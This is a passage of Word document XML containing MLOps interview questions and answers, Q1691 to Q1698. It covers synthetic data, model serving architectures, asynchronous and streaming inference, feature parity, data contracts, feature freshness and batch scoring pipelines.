        <w:t xml:space="preserve">      * Faster dataset creation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scales to large datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Useful when labeled data is limited</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Noisy or inaccurate labels</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lower label quality</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bias in heuristic rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requires strong validation and monitoring</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NLP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Medical AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large-scale enterprise AI systems</w:t>
        <w:br/>
        <w:t>Popular Tools and Frameworks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Snorkel</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, weak supervision helps accelerate data preparation pipelines and enables scalable ML development when high-quality labeled datasets are expensive or difficult to obtain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1691. What is synthetic data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Synthetic data is artificially generated data that mimics the characteristics, patterns, and statistical properties of real-world data without directly using actual sensitive or original data records.</w:t>
        <w:br/>
        <w:t>It is created using algorithms, simulations, generative AI models, or rule-based systems to train, test, or validate machine learning models.</w:t>
        <w:br/>
        <w:t>Why Synthetic Data is Used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Protect sensitive or private information</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduce dependency on real datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handle limited or imbalanced data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Generate rare event scenarios</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve scalability for ML training</w:t>
        <w:br/>
        <w:t>Common Types of Synthetic Data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Tabular Synthetic Data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Structured data like customer or transaction records.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Image Synthetic Data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AI-generated images for computer vision training.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Text Synthetic Data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Artificially generated text for NLP tasks.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Time-Series Synthetic Data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simulated sensor, financial, or IoT data streams.</w:t>
        <w:br/>
        <w:t>Methods for Generating Synthetic Data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rule-based simulations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Statistical modeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Generative Adversarial Networks (GANs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Variational Autoencoders (VAEs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large Language Models (LLMs)</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved privacy and compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster dataset generation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better model robustness</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier testing and experimentation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports edge cases and rare scenarios</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Synthetic data may not perfectly represent real-world behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Risk of introducing hidden bias</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Validation complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Possible reduction in model generalization accuracy</w:t>
        <w:br/>
        <w:t>Popular Tools and Frameworks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gretel.ai</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SDV</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mostly AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Synthea</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, synthetic data is useful for scalable model training, testing, privacy-preserving AI development, and improving data availability in enterprise ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1692. Explain model serving architectures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model serving architecture refers to the design and infrastructure used to deploy, manage, and deliver machine learning model predictions in production environments.</w:t>
        <w:br/>
        <w:t>It defines how inference requests are received, processed, scaled, monitored, and returned to applications or users.</w:t>
        <w:br/>
        <w:t>The goal of model serving architecture is to provide reliable, scalable, low-latency, and efficient prediction services.</w:t>
        <w:br/>
        <w:t>Common Model Serving Architectures</w:t>
        <w:br/>
        <w:t>1. Real-Time / Online Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Predictions are generated instantly for incoming requests.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Used in chatbots, fraud detection, recommendations, and APIs.</w:t>
        <w:br/>
        <w:t>Flow:</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Client → API Gateway → Model Server → Prediction Response</w:t>
        <w:br/>
        <w:t>2. Batch Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Predictions are generated in bulk at scheduled intervals.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Used for analytics, reporting, and large-scale scoring jobs.</w:t>
        <w:br/>
        <w:t>3. Streaming Inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous prediction on streaming data in near real time.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Used in IoT, monitoring, and event-driven systems.</w:t>
        <w:br/>
        <w:t>4. Edge Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Models are deployed directly on edge devices for local inference.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Used in mobile apps, smart cameras, and autonomous systems.</w:t>
        <w:br/>
        <w:t>Core Components of Serving Architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API gateway</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature store</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and logging systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autoscaling infrastructure</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU/TPU acceleration</w:t>
        <w:br/>
        <w:t>Deployment Patterns</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Single Model Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Multi-model Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Canary Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Blue-Green Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Champion-Challenger Deployment</w:t>
        <w:br/>
        <w:t>Popular Model Serving Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TorchServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Seldon Core</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ray Serve</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ONNX Runtime</w:t>
        <w:br/>
        <w:t>Infrastructure Technologies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nginx</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, model serving architecture is critical for ensuring scalable deployment, low-latency inference, observability, fault tolerance, and continuous delivery of ML models in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1693. What is asynchronous inference?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Asynchronous inference is a model serving approach where prediction requests are submitted to a machine learning system and processed in the background without requiring the client to wait immediately for the response.</w:t>
        <w:br/>
        <w:t>Instead of returning predictions instantly like synchronous inference, the system acknowledges the request first and delivers the result later once processing is completed.</w:t>
        <w:br/>
        <w:t>This approach is commonly used for large, slow, or resource-intensive inference workloads.</w:t>
        <w:br/>
        <w:t>How Asynchronous Inference Works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Client sends inference request</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Request is placed into a queue or message broker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Worker nodes process the request asynchronously</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Result is stored or returned later through callback, polling, or notification</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large Language Models (LLMs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Video processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch image analysis</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Document AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Long-running deep learning tasks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High-volume enterprise workloads</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved system throughput</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced request timeout issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient resource utilization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports long-running inference jobs</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Increased architectural complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Result tracking and synchronization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Queue management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Delayed response handling</w:t>
        <w:br/>
        <w:t>Common Components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Message queues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Worker services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autoscaling infrastructure</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Notification services</w:t>
        <w:br/>
        <w:t>Popular Technologies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RabbitMQ</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ray Serve</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Celery</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t>Difference Between Synchronous and Asynchronous Inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Synchronous inference: Client waits for immediate prediction response.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Asynchronous inference: Client submits request and receives result later.</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, asynchronous inference is important for handling scalable, distributed, and compute-intensive AI workloads efficiently in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1694. Explain streaming inference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Streaming inference is a machine learning inference approach where predictions are generated continuously on real-time data streams as data arrives, instead of processing data in batches.</w:t>
        <w:br/>
        <w:t>It is used in systems that require immediate insights and low-latency decision-making.</w:t>
        <w:br/>
        <w:t>How Streaming Inference Works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data continuously flows from sources like sensors, logs, transactions, or user events</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Streaming platforms ingest the data in real time</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. ML models process incoming events instantly</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Predictions or actions are generated continuously</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IoT monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Predictive maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time analytics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autonomous vehicles</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stock market analysis</w:t>
        <w:br/>
        <w:t>Key Characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Low latency inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous event handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Event-driven architecture</w:t>
        <w:br/>
        <w:t>Components in Streaming Inference Architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data producers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Message brokers or streaming platforms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stream processing engines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model serving layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and alerting systems</w:t>
        <w:br/>
        <w:t>Popular Technologies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Flink</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Spark Streaming</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ray Serve</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Immediate predictions and actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster business response</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better customer experience</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time anomaly detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous operational intelligence</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High infrastructure complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scalability management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time monitoring requirements</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fault tolerance and recovery handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling data spikes and ordering issues</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, streaming inference is essential for building scalable, low-latency, and event-driven AI systems capable of processing real-time production workloads continuously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1695. What is feature parity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature parity in machine learning refers to maintaining consistency between the features used during model training and the features used during inference or production serving.</w:t>
        <w:br/>
        <w:t>It ensures that the same feature engineering logic, transformations, calculations, and data definitions are applied across both training and serving environments.</w:t>
        <w:br/>
        <w:t>The main goal of feature parity is to prevent inconsistencies that can lead to inaccurate predictions and training-serving skew.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>If a feature like “customer_age” is normalized during training but not normalized during inference, the model may produce incorrect predictions. Feature parity ensures both environments process the feature identically.</w:t>
        <w:br/>
        <w:t>Key Areas of Feature Parity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature transformations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Encoding logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scaling and normalization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Missing value handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Aggregation rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature version consistency</w:t>
        <w:br/>
        <w:t>Why Feature Parity is Important</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevents training-serving skew</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improves prediction reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures reproducibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simplifies debugging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintains production model accuracy</w:t>
        <w:br/>
        <w:t>Common Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate training and inference pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manual feature engineering differences</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Version mismatches</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time vs batch feature inconsistencies</w:t>
        <w:br/>
        <w:t>Best Practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use shared feature pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Implement centralized feature stores</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automate feature validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apply version control for features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use CI/CD for feature deployment</w:t>
        <w:br/>
        <w:t>Popular Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feast</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Extended</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, feature parity is critical for maintaining consistent, trustworthy, and production-ready machine learning systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1696. Explain data contracts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data contracts are formal agreements that define the structure, format, quality, schema, and expectations of data exchanged between data producers and data consumers in a system.</w:t>
        <w:br/>
        <w:t>In ML and data engineering environments, data contracts help ensure that upstream data changes do not break downstream pipelines, analytics, or machine learning models.</w:t>
        <w:br/>
        <w:t>A data contract typically defines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Schema and field names</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data types</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Required and optional fields</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data quality rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Validation constraints</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data ownership and SLAs</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>A customer data contract may specify:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * customer_id must be integer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * email cannot be null</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * signup_date must follow ISO date format</w:t>
        <w:br/>
        <w:t>If upstream systems violate these rules, automated validation can block bad data from entering ML pipelines.</w:t>
        <w:br/>
        <w:t>Why Data Contracts are Important</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevent pipeline failures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve data reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduce schema-breaking changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensure feature consistency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Support governance and compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve collaboration between teams</w:t>
        <w:br/>
        <w:t>Data Contracts in MLOps</w:t>
        <w:br/>
        <w:t>In ML systems, data contracts help maintain:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature parity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Consistent training data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reliable inference pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stable model performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better monitoring and observability</w:t>
        <w:br/>
        <w:t>Common Components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Schema validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Data quality checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Ownership definitions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Change management policies</w:t>
        <w:br/>
        <w:t>Popular Tools and Technologies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Avro</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Protobuf</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Great Expectations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka Schema Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OpenAPI</w:t>
        <w:br/>
        <w:t>From an MLOps and data engineering perspective, data contracts are essential for building scalable, reliable, and maintainable data and ML pipelines across distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1697. What is feature freshness?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature freshness refers to how recent and up-to-date a machine learning feature is when it is used for model inference or training.</w:t>
        <w:br/>
        <w:t>It measures the time difference between when data is generated and when the corresponding feature becomes available to the ML model.</w:t>
        <w:br/>
        <w:t>Feature freshness is especially important in real-time and streaming ML systems where stale data can reduce prediction accuracy.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>In a fraud detection system:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Latest transaction amount and user activity should be updated immediately.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If features are delayed by several hours, the model may miss fraudulent behavior.</w:t>
        <w:br/>
        <w:t>Why Feature Freshness is Important</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improves prediction accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enables real-time decision-making</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduces stale feature problems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports dynamic and event-driven systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintains model reliability in production</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stock market prediction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IoT monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Personalized advertising</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time analytics</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data pipeline latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Delayed stream processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch update limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed system synchronization issues</w:t>
        <w:br/>
        <w:t>How Feature Freshness is Maintained</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Streaming data pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time feature stores</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Event-driven architectures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Low-latency ingestion systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous monitoring and alerting</w:t>
        <w:br/>
        <w:t>Popular Technologies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feast</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Spark Streaming</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Flink</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Redis</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, feature freshness is a critical factor for ensuring real-time ML systems provide accurate, timely, and production-ready predictions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1698. Explain batch scoring pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Batch scoring pipelines are automated workflows used to generate machine learning predictions for large volumes of data at scheduled intervals instead of in real time.</w:t>
        <w:br/>
        <w:t>In batch scoring, data is collected over a period of time and processed together in bulk to produce predictions efficiently.</w:t>
        <w:br/>
        <w:t>How Batch Scoring Pipelines Work</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data is collected from databases, files, or data lakes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. ETL or preprocessing steps prepare the data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Features are generated and validated</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. The trained model processes the dataset in batches</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Predictions are stored in databases, warehouses, or reports</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Customer churn prediction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Credit risk scoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation generation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud analysis reports</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Marketing campaign targeting</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Demand forecasting</w:t>
        <w:br/>
        <w:t>Key Characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduled execution (hourly, daily, weekly)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High throughput processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cost-efficient for large datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Suitable for non-real-time applications</w:t>
        <w:br/>
        <w:t>Components of a Batch Scoring Pipeline</w:t>
        <w:br/>
